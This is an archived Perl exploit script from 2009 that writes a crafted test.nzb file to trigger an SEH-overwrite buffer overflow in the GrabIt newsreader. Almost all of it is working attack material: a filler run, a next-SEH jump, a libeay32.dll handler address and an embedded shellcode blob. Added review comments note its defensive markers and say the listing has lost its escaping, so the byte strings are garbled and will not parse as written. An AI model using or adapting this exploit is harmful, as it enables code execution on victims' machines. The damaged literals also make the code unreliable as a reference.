
# Title : Grabit <= 1.7.2 Beta 3 (.nzb) Local Buffer Overflow Exploit (SEH)
# Published : 2009-05-05
# Author : Gaurav Baruah


#!/usr/bin/perl
# Grabit<=1.7.2 Beta 3 (.nzb) SEH Overwrite Exploit
# Coded by: Gaurav Baruah
# Discovery: Niels Teusink
#http://packetstormsecurity.org/filedesc/grabit-overflow.txt.html
# Greetz to Vivek
#Tested on XP SP3 and XP SP2 (en)
#
# What this script does: it writes a single file, test.nzb, made of an
# NZB/XML prologue, a 248-byte run of "A" filler, two short 4-byte strings
# ($next_seh, $seh) and a longer byte string ($shellcode), in that order.
# The title describes the target as an SEH overwrite in GrabIt's .nzb
# parsing; the layout below (filler, then next-SEH, then handler address)
# is consistent with that description.  From a defensive standpoint the
# relevant observations are that the trigger is a local file opened by the
# client, that the handler address is version-specific (see $seh), and that
# the resulting file has a grossly oversized field in an otherwise tiny
# XML document.
#
# NOTE(review): this archived listing appears to have lost escaping — the
# quoted literals contain bare "x.." sequences and unescaped quotes — so the
# block is reproduced as found and is not expected to parse as written.
my $header1=
"<?xml version="1.0"?>
<!DOCTYPE nzb
  PUBLIC "-//newzBin//DTD NZB 1.0//EN"
         "";

# Payload body; concatenated string literal, kept verbatim from the listing.
my $shellcode=
"x29xc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13xe8".
"x61xfbx36x83xebxfcxe2xf4x14x89xbfx36xe8x61x70x73".
"xd4xeax87x33x90x60x14xbdxa7x79x70x69xc8x60x10x7f".
"x63x55x70x37x06x50x3bxafx44xe5x3bx42xefxa0x31x3b".
"xe9xa3x10xc2xd3x35xdfx32x9dx84x70x69xccx60x10x50".
"x63x6dxb0xbdxb7x7dxfaxddx63x7dx70x37x03xe8xa7x12".
"xecxa2xcaxf6x8cxeaxbbx06x6dxa1x83x3ax63x21xf7xbd".
"x98x7dx56xbdx80x69x10x3fx63xe1x4bx36xe8x61x70x5e".
"xd4x3excaxc0x88x37x72xcex6bxa1x80x66x80x91x71x32".
"xb7x09x63xc8x62x6fxacxc9x0fx02x9ax5ax8bx61xfbx36";

# 4-byte value placed where the next-SEH pointer is expected.
my $next_seh = "xEBx06x90x90";
# 4-byte handler address; per the author's comment it comes from
# libeay32.dll, so it is tied to the module build shipped with the tested
# GrabIt/XP combination noted in the header (not portable across versions).
my $seh = "xE5x56x01x10" ;   #libeay32.dll
# Output filename, written to the current directory.
my $file = "test.nzb";

# Two-arg open with a bareword filehandle.  Also note the precedence bug:
# `||` binds to the string ">./$file", which is always true, so the `die`
# branch is never reached and an open failure goes unreported.
open (nzb, ">./$file") || die "nCan't open $file: $!";
# File layout: prologue, 248 x "A", next-SEH, handler address, payload.
print nzb "$header1" . "x41" x 248 . "$next_seh" . "$seh" . "$shellcode";
close (nzb);   # return value not checked; a buffered write error is lost here
sleep 1;
print "nFile $file successfully created!n";

# www.Syue.com [2009-05-05]